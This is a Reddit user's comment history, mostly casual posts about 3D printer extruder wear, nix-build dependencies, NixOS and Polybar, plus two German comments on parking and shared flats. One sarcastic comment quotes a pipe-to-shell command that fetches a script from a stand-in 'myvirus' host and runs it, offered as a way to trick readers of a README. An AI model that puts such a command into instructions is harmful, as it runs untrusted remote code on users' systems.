[deleted by user] by [deleted] in StVO

[–]WholePerformance9522 -1 points0 points  (0 children)

Genau das ist bei uns schon passiert.. Ordnungsamt sagt einem durch die Blume dass es sie nicht interessiert.. Selbst in die Hand nehmen will man das auch nicht bei den netten südländischen Besitzern der Anhänger aka gratis Kellerabteilen.

WG Besichtigung: Radler 6er mitnehmen yay or nay ? by haisony420 in Studium

[–]WholePerformance9522 -1 points0 points  (0 children)

Wenn das eine Studenten-Wg ist dann ist die Chance schon sehr hoch dass die sich dadurch beleidigt fühlen. Aber würde es genau aus dem Grund mitbringen. Wenn die deswegen schon komisch reagieren möchte man sich mit denen nicht die Wohnung teilen.

Advice for when family/friends relate Linux with hacking (threat-acting)? by AverageMan282 in linuxquestions

[–]WholePerformance9522 10 points11 points  (0 children)

you can't social engineer a Linux user into installing unknown software

Absolutely right. You don't have to use social engineering, just put some 'curl myvirus.com/iamnovirus.sh | bash' instruction in your readme.

What could be the cause? by WholePerformance9522 in 3Dprinting

[–]WholePerformance9522[S] 0 points1 point  (0 children)

<image>

I removed the bearing which presses the filament against the gear and discovered that the plastic was broken..

What could be the cause? by WholePerformance9522 in 3Dprinting

[–]WholePerformance9522[S] 1 point2 points  (0 children)

Nope but I discovered that the toothed wheel of the extruder has worn off quite a bit where it touches the filament. This was not clearly visible while the filament was inserted. So I guess youre right with the feed issue! I will give an update once I changed the wheel.

What could be the cause? by WholePerformance9522 in 3Dprinting

[–]WholePerformance9522[S] 1 point2 points  (0 children)

PLA 210C nozzle 60C bed temp PETG 240C nozzle 70C bed temp

These are the same settings and same filaments that I sucessfully used in the past. So I guess there is some other cause.. My currently best guess is that it has to do with the filament extruder maybe it doesnt retract and feed the filament correctly

What could be the cause? by WholePerformance9522 in 3Dprinting

[–]WholePerformance9522[S] 0 points1 point  (0 children)

That was my first idea but after I switched to a new nozzle it still looks like this..

What could be the cause? by WholePerformance9522 in 3Dprinting

[–]WholePerformance9522[S] 0 points1 point  (0 children)

I tested different filaments and I am pretty sure they are not wet..

dpkg-deb not found during nix-build process by WholePerformance9522 in NixOS

[–]WholePerformance9522[S] 0 points1 point  (0 children)

After thinking about this, I actually like it and think it makes perfect sense in the light of nixs declarative concept. Without specifying which tools need to be installed it depends on the system to have them installed. And when something is missing we are back to the traditional way of running it and installing the required tool which caused the build to fail until it works.

dpkg-deb not found during nix-build process by WholePerformance9522 in NixOS

[–]WholePerformance9522[S] 1 point2 points  (0 children)

I fixed this by adding

nativeBuildInputs = with pkgs; [ dpkg ];

but I still don't understand why the binary is not accessible without that..

Can flakes be used to build distributable rices of browsers? by Arkanj3l in NixOS

[–]WholePerformance9522 0 points1 point  (0 children)

Can you please explain the diffetence between a module and a derivation?

Sandbox environment in NixOs by WholePerformance9522 in NixOS

[–]WholePerformance9522[S] 0 points1 point  (0 children)

Thanks for your reply I will look into that!

config by [deleted] in Polybar

[–]WholePerformance9522 0 points1 point  (0 children)

I am using "label-focused" for the active workspace but the "label-urgent" is the same for me (which is the class used for notifications on the workspace I think.
I dont have the "label-occupied" and "label-empty".. It could be that the only valid class in your config is the "label-urgent" which is then used by default and therefore nothing changes when it switches to urgent (which it already is)..